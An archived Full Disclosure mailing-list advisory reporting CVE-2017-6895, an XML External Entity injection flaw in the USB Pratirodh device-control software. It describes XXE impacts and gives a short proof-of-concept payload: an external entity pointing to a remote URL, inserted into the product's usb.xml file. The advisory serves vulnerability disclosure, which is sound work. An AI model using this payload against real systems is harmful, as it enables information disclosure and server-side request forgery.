Full Disclosure mailing list archives

USB Pratirodh XML External Entity Injection Vulnerability


From: Sachin Wagh <wsachin092 () gmail com>
Date: Thu, 16 Mar 2017 17:31:22 +0530

Vulnerability Title: USB Pratirodh XML External Entity Injection
Vulnerability
Affekted Product: USB resistance
Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra
CVE-ID : CVE-2017-6895
Severity: Medium
Class: Twentieth [CWE-611]
Impact: XML External Entity, Information Disclosure, Denial Of Service,
Author: Sachin Wagh (@tiger_tigerboy)

*Description:*

USB Pratirodh is prone to an XML External Entity injection vulnerability.
XXE attack is an attack on an application that parses XML input from
untrusted sources using incorrectly configured XML parser. This attack may
lead to the disclosure of confidential data, denial of service, server side
request forgery, port scanning from the perspective of the machine where
the parser is located, and other system impacts.
Proof of Concept:

Added below code after xml tag in to the usb.xml file.

*<!DOCTYPE foo [ *
* <!ELEMENT foo ANY >*
* <!ENTITY xxe SYSTEM "http://tigerboy.com/XXE <http://tigerboy.com/XXE>"
]><foo>&xxe;</foo>*

*Reference:*

https://secur1tyadvisory.wordpress.com/2017/03/15/usb-
pratirodh-xml-external-entity-injection-vulnerability/

*Credit:*

*Sachin Wagh (tiger_tigerboy)*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Current thread: